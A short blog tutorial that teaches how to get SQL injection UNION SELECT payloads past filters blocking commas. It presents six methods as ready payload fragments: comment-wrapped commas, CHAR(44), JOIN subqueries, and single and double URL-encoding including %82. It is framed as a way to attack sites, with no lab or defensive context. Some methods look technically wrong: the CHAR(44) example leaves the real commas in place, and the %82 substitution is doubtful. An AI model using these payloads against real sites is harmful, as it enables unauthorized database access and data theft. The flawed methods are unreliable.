Sql Injection – Inject A Site When Commas Are Blocked

Sql Injection – Inject A Site When Commas Are Blocked

Inject A Site When Commas Are Blocked

In this tutorial I will show you how to Inject a site when commas are blocked. Injecting a site when commas are blocked is too easy.

There are many methods to bypass commas in sql injection.

# Method 1

By putting , in comment like

union select 1/*!,*/ 2/*!,*/ 3


union select 1/*,*/ 2/*,*/ 3

# Method 2

We can use CHAR(44). CHAR value is the Ascii value of Comma. After regular commas are strip out by WAF those as CHAR may remains.

union select 1,CHAR(44), 2,CHAR(44), 3

# Method 3

We can use command join.

(select 1)a join (select 2)b join (select 3)c

# Method 4

Escaped-encoding/URL encoding (or sometimes referred to as percent-encoding) is a method of representing characters within an URL that may need special syntax handling to be correctly interpreted. This is achieved by encoding the character to be interpreted with a sequence of three characters. It consists of the percentage character % followed by the two hexadecimal digits representing the octet code of the original character. For example, the US-ASCII character set represents a comma with octet code 44, or hexadecimal 2C. Thus its URL-encoded representation is %2C.

union select 1%2C 2%2C 3

# Method 5

we can replace the comma with %82.

union select 1%82 2%82 3

# Method 6

Sometimes this basic URL-encoding attack might not work, however you can circumvent the WAF by double URL-encoding the blocked character(s). In the double-encoded attack the % character in the original command is itself URL-encoded in the normal way (as %25) so that the double-URL-encoded value of comma (%2C) is %252C.

union select 1%252C 2%252C 3

Thanks for reading guys. Now my next tutorial will be on bypassing white spaces. keep sharing and learning 🙂

Author: Ahmed Raza Memon

I am 17 years old Ethical Hacker, Penetration Tester, Web Security Expert and Exploit Writer From the India. My area of expertise includes Ethical Hacking, Vulnerability Assessment, Information Security Audits, Penetration Testing, Exploit Writing, Web Application security, Source Code Reviews, Forensic Investigation and Cyber Law. I have been Acknowledged by many top companies like Microsoft, Apple, SAP, AOL, Sony and many More...

1 thought on “Sql Injection – Inject A Site When Commas Are Blocked”

Leave a Reply